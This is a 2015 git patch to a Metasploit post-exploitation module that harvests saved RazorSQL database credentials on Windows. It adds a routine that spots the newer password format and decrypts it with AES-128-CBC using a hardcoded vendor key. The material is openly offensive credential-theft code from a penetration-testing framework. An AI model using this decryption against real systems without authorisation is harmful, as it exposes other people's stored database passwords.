From eb39eaac1d00aec1cada9056a5f543704c8262f6 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Mon, 15 Jun 2015 23:28:10 -0500
Subject: [PATCH] Add support to decryption v2

---
 .../windows/gather/credentials/razorsql.rb    | 23 +++++++++++++++++--
 1 file changed, 21 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razorsql.rb b/modules/post/windows/gather/credentials/razorsql.rb
index 4e7231c840..a01bb9b7b8 100644
--- a/modules/post/windows/gather/credentials/razorsql.rb
+++ b/modules/post/windows/gather/credentials/razorsql.rb
@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'rex'
 require 'msf/core/auxiliary/report'
+require 'openssl'
 
 class Metasploit3 < Msf::Post
 
@@ -138,7 +139,13 @@ class Metasploit3 < Msf::Post
       pass     = (db.scan(/password=(.*)/).flatten[0] ||'').strip
 
       # Decrypt if there's a password
-      decrypted_pass = decrypt(pass) unless pass.blank?
+      unless pass.blank?
+        if pass =~ /\{\{\{VFW(.*)!\^\*#\$RIG/
+          decrypted_pass = decrypt_v2($1)
+        else
+          decrypted_pass = decrypt(pass)
+        end
+      end
 
       pass = decrypted_pass ? decrypted_pass : pass
 
@@ -191,8 +198,20 @@ class Metasploit3 < Msf::Post
       password << char
     end
 
-    return password
+    password
   end
+
+  def decrypt_v2(encrypted)
+    enc = Rex::Text.decode_base64(encrypted)
+    key = Rex::Text.decode_base64('LAEGCx0gKU0BAQICCQklKQ==')
+
+    aes = OpenSSL::Cipher.new('AES-128-CBC')
+    aes.decrypt
+    aes.key = key
+
+    aes.update(enc) + aes.final
+  end
+
 end
 
 =begin